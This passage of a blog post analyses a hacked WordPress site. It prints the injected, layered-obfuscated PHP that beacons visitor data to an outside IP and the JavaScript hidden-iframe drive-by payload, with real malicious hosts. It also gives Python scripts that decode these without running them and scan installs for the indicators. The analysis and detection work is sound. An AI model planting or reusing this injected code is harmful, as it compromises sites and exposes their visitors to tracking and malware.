eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));
```

Layer 2 (the base64 argument of that eval, decoded):

```php
$_X=base64_decode($_X);$_X=strtr($_X,'123456aouie','aouie123456');$_R=ereg_replace('__FILE__',"'".$_F."'",$_X);eval($_R);$_R=0;$_X=0;
```

Layer 3:

```php
$_X=base64_decode($_X);
```

Result:

```php
?><?php $3rl = 'http://96.69e.a6e.o0/bt.php'; ?>
```

Layer 4:

```php
$_X=strtr($_X,'123456aouie','aouie123456');
```

Result:

```php
?><?php $url = 'http://91.196.216.30/bt.php'; ?>
```

Layer 5:

```php
$_R=ereg_replace('__FILE__',"'".$_F."'",$_X);
```

Result (unchanged, since the decoded string contains no __FILE__):

```php
?><?php $url = 'http://91.196.216.30/bt.php'; ?>
```

Evaluate command:

```php
eval($_R);
```

Result:

```php
?><?php $url = 'http://91.196.216.30/bt.php'; ?>
```

```php
$_R=0;$_X=0;
```

Set these to 0 so you can't echo them without recreating the decoding process step by step.

Final result after decoding:

```php
$url = 'http://91.196.216.30/bt.php';
$ua = urlencode(strtolower($_SERVER['HTTP_USER_AGENT']));
$ip = $_SERVER['REMOTE_ADDR'];
$host = $_SERVER['HTTP_HOST'];
$uri = urlencode($_SERVER['REQUEST_URI']);
$ref = urlencode($_SERVER['HTTP_REFERER']);
$url = $url.'?ip='.$ip.'&host='.$host.'&uri='.$uri.'&ua='.$ua.'&ref='.$ref;
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_TIMEOUT, 2);
$re = curl_exec($ch);
curl_close($ch);
echo $re;
}
```

Complex! This is an enormous amount of work to obfuscate the code and throw off an investigator trying to figure out what happened to their site. It is an amazing level of complexity; kudos to the designer!
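The breakdown above can be reproduced statically, without ever handing the strings to eval(). The following is an added Python example written for this post (not the author's code and not part of WordPress): it pulls the two base64 literals out of the quoted counter_wordpress() source, peels the layers in the same order as the breakdown, and rebuilds the beacon URL the cURL call would request so the pattern can be matched in proxy or egress logs. The file path and the request fields it plugs in are constructed sample values.

```python
"""Unwrap the counter_wordpress() layers statically (no eval) and show the beacon it builds."""
import base64
import re
from urllib.parse import quote_plus

# The injected function as quoted in the post; only its two string literals matter here.
INJECTED_PHP = (
    "function counter_wordpress() {$_F=__FILE__;"
    "$_X='Pz48P3BocCAkM3JsID0gJ2h0dHA6Ly85Ni42OWUuYTZlLm8wL2J0LnBocCc7ID8+';"
    "eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7"
    "JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));"
    "/* ... the cURL beacon shown above follows ... */}"
)

B64_LITERAL = r"'([A-Za-z0-9+/=]+)'"


def php_strtr(text, frm, to):
    """PHP strtr($str, $from, $to): positional character swap; surplus characters
    in the longer of the two alphabets are ignored, as PHP does."""
    n = min(len(frm), len(to))
    return text.translate(str.maketrans(frm[:n], to[:n]))


def unwrap(php_source, file_path="/var/www/html/wp-settings.php"):
    """Peel the layers in the order the breakdown lists them.

    Returns (stage2, scrambled, decoded): the PHP hidden inside the eval (layer 2),
    the base64-decoded $_X before the alphabet swap (layer 3), and what eval($_R)
    would execute (layers 4 and 5). file_path stands in for __FILE__ ($_F)."""
    x_literal = re.search(r"\$_X\s*=\s*" + B64_LITERAL, php_source).group(1)
    stage2_b64 = re.search(r"eval\s*\(\s*base64_decode\s*\(\s*" + B64_LITERAL, php_source).group(1)
    stage2 = base64.b64decode(stage2_b64).decode("ascii")                  # layer 1 -> layer 2
    # Read the strtr() alphabets out of stage 2 instead of hard-coding them.
    frm, to = re.search(r"strtr\s*\(\s*\$_X\s*,\s*'([^']*)'\s*,\s*'([^']*)'", stage2).groups()
    scrambled = base64.b64decode(x_literal).decode("ascii")                # layer 3
    unscrambled = php_strtr(scrambled, frm, to)                            # layer 4
    decoded = unscrambled.replace("__FILE__", "'" + file_path + "'")       # layer 5 (ereg_replace)
    return stage2, scrambled, decoded


def extract_url(decoded):
    """The $url assignment that the rest of the function concatenates its parameters onto."""
    return re.search(r"\$url\s*=\s*'([^']*)'", decoded).group(1)


def beacon_url(base, ip, host, uri, ua, ref):
    """Rebuild the GET the cURL call issues: PHP urlencode() maps to quote_plus(),
    and the user agent is lower-cased before encoding, exactly as in the function."""
    return (f"{base}?ip={ip}&host={host}&uri={quote_plus(uri)}"
            f"&ua={quote_plus(ua.lower())}&ref={quote_plus(ref)}")


if __name__ == "__main__":
    stage2, scrambled, decoded = unwrap(INJECTED_PHP)
    print("layer 2 :", stage2)
    print("layer 3 :", scrambled)
    print("decoded :", decoded)
    # Constructed request values, to show the shape of the outbound beacon.
    print("beacon  :", beacon_url(extract_url(decoded), "203.0.113.7", "example.com",
                                  "/", "Mozilla/5.0", ""))
```

The beacon line is the string to hunt for in outbound proxy logs: a GET for bt.php carrying ip, host, uri, ua and ref query parameters.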
All of this makes sure that you cannot search for ANY of the words, URLs or text in your WordPress files or databases; no plain text search will turn up something layered like this, and it was hard enough to break it down! All of this encoding to hide the URL: http://91.196.216.30/bt.php. The end result is that the script sends this data to the server, with all parameters, and echoes whatever the server decides to spit back. In my case, it was the compressed JavaScript code, shown here uncompressed again for convenience:

```javascript
function MakeFrameEx() {
    element = document.getElementById('yahoo_api');
    if (!element) {
        var el = document.createElement('iframe');
        document.body.appendChild(el);
        el.id = 'yahoo_api';
        el.style.width = '1px';
        el.style.height = '1px';
        el.style.display = 'none';
        el.src = 'http://hardpancakes.xe.cx/showthread.php?t=72291731'
    }
}
var ua = navigator.userAgent.toLowerCase();
if (((ua.indexOf("msie") != -1 && ua.indexOf("opera") == -1 && ua.indexOf("webtv") == -1)) && ua.indexOf("windows") != -1) {
    var t = setTimeout("MakeFrameEx()", 500)
}
```

This code checks the user agent: if it is Internet Explorer (but not Opera or WebTV) on Windows, it sets a timeout to make an iframe with the previous code. This delay is perfect for stopping detection by bots, crawlers, and some passers-by. It causes confusion when troubleshooting it as well. The interesting thing about this malicious code is that it uses well known names, such as yahoo_api, to create a new element. This bit of code contacts a website known as hardpancakes.xe.cx, which then delivers its payload by opening up an iframe to http://finderonlinesearch.com/tds/in.cgi?5&user=mexx. Note that the website in the iframe was different earlier while troubleshooting than the one shown, but the user was always =mexx, which I found odd. I found the JavaScript snippet on Pastebin of all places, posted by a guest with no comments.
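The packed <script> quoted in The Problem section can also be unpacked statically, so that the host a given copy actually contacts is read out of that copy rather than from a version found elsewhere. This is an added Python example (mine, not the post's code) for the p,a,c,k,e,d packer's radix-36-or-less form, which is the form this sample uses; it rebuilds the packer's token dictionary and substitutes it back into the payload, then lists every URL in the result.

```python
"""Unpack a p,a,c,k,e,d (Dean Edwards style) script without executing it."""
import re

# The packed header script exactly as quoted in the post (raw string: the \' and \\ escapes are JS's).
PACKED_SCRIPT = r"""eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('d 9(){5=2.e(\'7\');f(!5){8 0=2.c(\'3\');2.g.h(0);0.6=\'7\';0.1.a=\'4\';0.1.b=\'4\';0.1.n=\'i\';0.r=\'s://q.o.j/3.k?6=l\'}}8 t=m("9()",p);',30,30,'el|style|document|iframe|1px|element|id|yahoo_api|var|MakeFrameEx|width|height|createElement|function|getElementById|if|body|appendChild|none|pl|php|2b8325qvzjut0iv8b87u9nlxnan0kpc|setTimeout|display|345|500|sokistatehouse|src|http|'.split('|'),0,{}))"""

# The call site at the end of the packer: }('<payload>',<radix>,<count>,'<word|list|>'.split('|'),0,{})
ARGS_RE = re.compile(
    r"\}\('((?:[^'\\]|\\.)*)',\s*(\d+),\s*(\d+),\s*'((?:[^'\\]|\\.)*)'\.split\('\|'\)"
)


def js_unescape(literal):
    """Resolve the backslash escapes of a single-quoted JS string literal (\\' and \\\\ here)."""
    return re.sub(r"\\(.)", r"\1", literal)


def unpack(packed):
    """Return the source the packer would hand to eval(), computed by substitution only."""
    m = ARGS_RE.search(packed)
    if not m:
        raise ValueError("not a p,a,c,k,e,d call in the expected shape")
    payload = js_unescape(m.group(1))
    radix, count = int(m.group(2)), int(m.group(3))
    if radix > 36:
        raise ValueError("radix > 36 uses the packer's extended alphabet, not handled here")
    words = js_unescape(m.group(4)).split("|")[:count]

    def lookup(match):
        token = match.group(0)
        try:
            index = int(token, radix)      # token c is c.toString(radix) in the packer
        except ValueError:
            return token                   # not a packer token: leave it alone
        if index < len(words) and words[index]:
            return words[index]
        return token                       # empty slot: the token was already the literal text

    # The packer replaces every \b\w+\b in the payload through its dictionary; do the same.
    return re.sub(r"\b\w+\b", lookup, payload, flags=re.ASCII)


def extract_urls(js):
    """Every http(s) URL literal in the unpacked code, for blocklists and log searches."""
    return re.findall(r"https?://[^\s'\"]+", js)


if __name__ == "__main__":
    code = unpack(PACKED_SCRIPT)
    print(code)
    print("URLs:", extract_urls(code))
```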
I was interested: where the hell are these domains going, and where is the IP address located for the originating server that initializes the script? Frankfurt, Germany, and Moscow, Russia. I ran tracert and whois against the originating IP and the two iframe hosts; you can form your own opinions.

Permissions

Permissions are important, and here is where it gets confusing. I am not sure if it was I that left the permissions on this specific account so open (757), or if someone else logged in and did it, or if there was some WordPress vulnerability that was able to do this, but the permissions on all the files were different from those of my safe and unaffected installs. I am assuming that there is some vulnerability in WordPress that allows a user to write to these directories if the permissions are set in such a way, but I have no evidence or lead as to what it was that did it.
Notice in the examples below that the dirty folder structure has wp-settings.php modified sometime in September, while the other w- files were modified around the day of installation. This was not me, as I was modifying it to fix it on the 13th.

Example Clean Folder Structure

```
-rw-r--r-- 1 root root   561 Jun  2 13:53 .htaccess
-rw-r--r-- 1 root root   397 Sep 15 15:16 index.php
-rw-r--r-- 1 root root 16899 Sep 15 15:17 license.txt
-rw-r--r-- 1 root root  9202 Sep 15 15:16 readme.html
-rw-r--r-- 1 root root  4343 Sep 15 15:16 wp-activate.php
drwxr-xrwx 9 root root  4096 Sep 15 15:17 wp-admin
-rw-r--r-- 1 root root 40243 Sep 15 15:16 wp-app.php
-rw-r--r-- 1 root root   226 Sep 15 15:16 wp-atom.php
-rw-r--r-- 1 root root   274 Sep 15 15:16 wp-blog-header.php
-rw-r--r-- 1 root root  3931 Sep 15 15:16 wp-comments-post.php
-rw-r--r-- 1 root root   244 Sep 15 15:16 wp-commentsrss2.php
-rwxr-xrwx 1 root root  3471 Sep 19 10:04 wp-config.php
-rw-r--r-- 1 root root  3177 Sep 15 15:16 wp-config-sample.php
drwxr-xrwx 8 root root  4096 Sep 19 10:04 wp-content
-rw-r--r-- 1 root root  1255 Sep 15 15:16 wp-cron.php
-rw-r--r-- 1 root root   246 Sep 15 15:16 wp-feed.php
drwxr-xrwx 8 root root  4096 Sep 15 15:17 wp-includes
-rw-r--r-- 1 root root  1997 Sep 15 15:16 wp-links-opml.php
-rw-r--r-- 1 root root  2525 Sep 15 15:16 wp-load.php
-rw-r--r-- 1 root root 27601 Sep 15 15:16 wp-login.php
-rw-r--r-- 1 root root  7774 Sep 15 15:16 wp-mail.php
-rw-r--r-- 1 root root   494 Sep 15 15:16 wp-pass.php
-rw-r--r-- 1 root root   224 Sep 15 15:17 wp-rdf.php
-rw-r--r-- 1 root root   334 Sep 15 15:17 wp-register.php
-rw-r--r-- 1 root root   226 Sep 15 15:16 wp-rss2.php
-rw-r--r-- 1 root root   224 Sep 15 15:16 wp-rss.php
-rw-r--r-- 1 root root  9839 Sep 15 15:17 wp-settings.php
-rw-r--r-- 1 root root 18646 Sep 15 15:17 wp-signup.php
-rw-r--r-- 1 root root  3702 Sep 15 15:17 wp-trackback.php
-rw-r--r-- 1 root root  3266 Sep 15 15:16 xmlrpc.php
```

Example Dirty Folder Structure

```
drwxr-xr-x 5 root root  4096 Sep 29 23:05 .
drwxr-xr-x 3 root root  4096 Oct 10 17:42 ..
-rwxr-xr-x 1 root root   200 Aug 25 17:29 .htaccess
-rwxr-xrwx 1 root root   397 May 25  2008 index.php
-rwxr-xrwx 1 root root 16899 Jun  8 13:18 license.txt
-rwxr-xrwx 1 root root  9202 Jul 12 13:24 readme.html
-rwxr-xrwx 1 root root  4343 May  6 22:26 wp-activate.php
drwxr-xrwx 9 root root  4096 Jul 12 14:24 wp-admin
-rwxr-xrwx 1 root root 40243 Jun  1 17:03 wp-app.php
-rwxr-xrwx 1 root root   226 Dec  9  2010 wp-atom.php
-rwxr-xrwx 1 root root   274 Nov 20  2010 wp-blog-header.php
-rwxr-xrwx 1 root root  3931 Dec  9  2010 wp-comments-post.php
-rwxr-xrwx 1 root root   244 Dec  9  2010 wp-commentsrss2.php
-rwxr-xrwx 1 root root  3166 Aug 24 19:21 wp-config.php
drwxr-xrwx 6 root root  4096 Oct 12 19:21 wp-content
-rwxr-xrwx 1 root root  1255 Mar 16  2010 wp-cron.php
-rwxr-xrwx 1 root root   246 Dec  9  2010 wp-feed.php
drwxr-xrwx 8 root root  4096 Sep 30 01:35 wp-includes
-rwxr-xrwx 1 root root  1997 Oct 23  2010 wp-links-opml.php
-rwxr-xrwx 1 root root  2525 Jun 29 11:50 wp-load.php
-rwxr-xrwx 1 root root 27601 Jun 22 14:45 wp-login.php
-rwxr-xrwx 1 root root  7774 May 25  2010 wp-mail.php
-rwxr-xrwx 1 root root   494 Dec  9  2010 wp-pass.php
-rwxr-xrwx 1 root root   224 Dec  9  2010 wp-rdf.php
-rwxr-xrwx 1 root root   334 Dec  9  2010 wp-register.php
-rwxr-xrwx 1 root root   226 Dec  9  2010 wp-rss2.php
-rwxr-xrwx 1 root root   224 Dec  9  2010 wp-rss.php
-rwxr-xrwx 1 root root 10969 Sep 12 05:39 wp-settings.php
-rwxr-xrwx 1 root root 18646 May 22 17:30 wp-signup.php
-rwxr-xrwx 1 root root  3702 Feb 24  2010 wp-trackback.php
-rwxr-xrwx 1 root root  3266 Apr 17 03:35 xmlrpc.php
```

The Questions

How did it get in? I have no idea. My permissions were set way too loosely on this site; I believe they were set to 757 whereas all my others are 755 or less. This gives public write access to the server. Still… what did they use to access and write to the server? There was only one username, my box has no other user accounts on it, and FTP is disabled; I only use SSH and SFTP.
It is puzzling; any insights or suggestions are appreciated. Who are these Russians / Germans that are hosting these sites? What are they trying to pull? I would love to recreate the injection on my own on a clean box and browser to see what JavaScript and data it pulls from the other sites. I'd have to install something to sniff out the data going between the injected iframe and JavaScript and the site, but that's for another day when I actually have time! My next step should probably be to e-mail these people, or give them a ring, and see if they even know this is happening through their servers. I hope this article has been helpful; I look forward to further analysis in the comments!
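The three checks this post walks through by hand (the ls -al comparison of modification dates in The Solution, the grep for a wp_head hook that does not belong next to an eval(base64_decode(...)), and the 757 permissions from the Permissions section) can be run together over an install. This is an added Python example written for this post, not the author's code and not part of WordPress; it builds its own constructed fixture install in a temporary directory, with 'QUJD' standing in for the real base64 payload, and the indicator patterns and tolerance values are my choices.

```python
"""Triage a WordPress tree for the wp_head hook injection described in this post."""
import os
import re
import stat
import tempfile
from collections import Counter
from pathlib import Path

# Indicators drawn from the injected function: an eval over base64, a wp_head
# callback registration, and a strtr() alphabet swap used as a decoding layer.
SUSPECT_PATTERNS = {
    "eval_base64": re.compile(r"eval\s*\(\s*base64_decode\s*\(", re.I),
    "wp_head_hook": re.compile(r"add_action\s*\(\s*['\"]wp_head['\"]", re.I),
    "strtr_alphabet": re.compile(r"strtr\s*\(\s*\$\w+\s*,\s*'[0-9a-z]+'\s*,\s*'[0-9a-z]+'\s*\)", re.I),
}


def scan_file(path):
    """Return the names of the indicators present in one PHP file."""
    text = Path(path).read_text(errors="replace")
    return sorted(name for name, rx in SUSPECT_PATTERNS.items() if rx.search(text))


def scan_tree(root):
    """Map each .php file (relative POSIX path) to the indicators it triggers."""
    root = Path(root)
    findings = {}
    for path in root.rglob("*.php"):
        hits = scan_file(path)
        if hits:
            findings[path.relative_to(root).as_posix()] = hits
    return findings


def suspicious(findings):
    """Files worth opening: any eval(base64_decode()), or a wp_head hook registered
    from a top-level core file. Core's own wp_head registrations live under
    wp-includes/, and themes/plugins legitimately add them under wp-content/."""
    return sorted(
        rel for rel, hits in findings.items()
        if "eval_base64" in hits or ("wp_head_hook" in hits and "/" not in rel)
    )


def mtime_outliers(root, tolerance_days=1):
    """The ls -al check automated: top-level wp-*.php files whose modification day
    is more than tolerance_days away from the day most of them share."""
    files = list(Path(root).glob("wp-*.php"))
    if not files:
        return []
    day_of = {p: int(p.stat().st_mtime // 86400) for p in files}
    modal_day = Counter(day_of.values()).most_common(1)[0][0]
    return sorted(p.name for p, day in day_of.items() if abs(day - modal_day) > tolerance_days)


def world_writable(root):
    """Top-level entries whose mode grants write to 'other' (e.g. 757), the weak
    setting the post found on the infected install."""
    return sorted(p.name for p in Path(root).iterdir() if p.stat().st_mode & stat.S_IWOTH)


def build_sample_install(root):
    """Constructed fixture (not a real install): two clean core files, one core file
    carrying an injected hook, and a legitimate wp-includes/ registration."""
    root = Path(root)
    (root / "wp-includes").mkdir()
    (root / "wp-load.php").write_text("<?php require_once 'wp-config.php';\n")
    (root / "wp-config.php").write_text("<?php define('DB_NAME', 'wp');\n")
    (root / "wp-settings.php").write_text(
        "<?php\n"
        # 'QUJD' is a constructed placeholder, not the payload quoted in the post
        "function counter_wordpress(){$_X='QUJD';eval(base64_decode('QUJD'));}"
        "add_action('wp_head', 'counter_wordpress');\n"
        "do_action('init');\n")
    (root / "wp-includes" / "default-filters.php").write_text(
        "<?php add_action( 'wp_head', 'wp_enqueue_scripts', 1 );\n")
    base = 1_000_000_000                      # install day for the clean files
    for name in ("wp-load.php", "wp-config.php"):
        os.utime(root / name, (base, base))
        os.chmod(root / name, 0o644)
    late = base + 30 * 86400                  # injected file touched a month later
    os.utime(root / "wp-settings.php", (late, late))
    os.chmod(root / "wp-settings.php", 0o757)
    os.chmod(root / "wp-includes", 0o755)


def demo():
    """Build the fixture in a temp dir and run all three checks over it."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_install(tmp)
        return suspicious(scan_tree(tmp)), mtime_outliers(tmp), world_writable(tmp)


if __name__ == "__main__":
    for label, result in zip(("suspicious files", "mtime outliers", "world-writable"), demo()):
        print(f"{label}: {result}")
```

Point the three check functions at a real document root instead of the fixture to triage an install; a hit in all three on the same core file is the profile this post describes.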
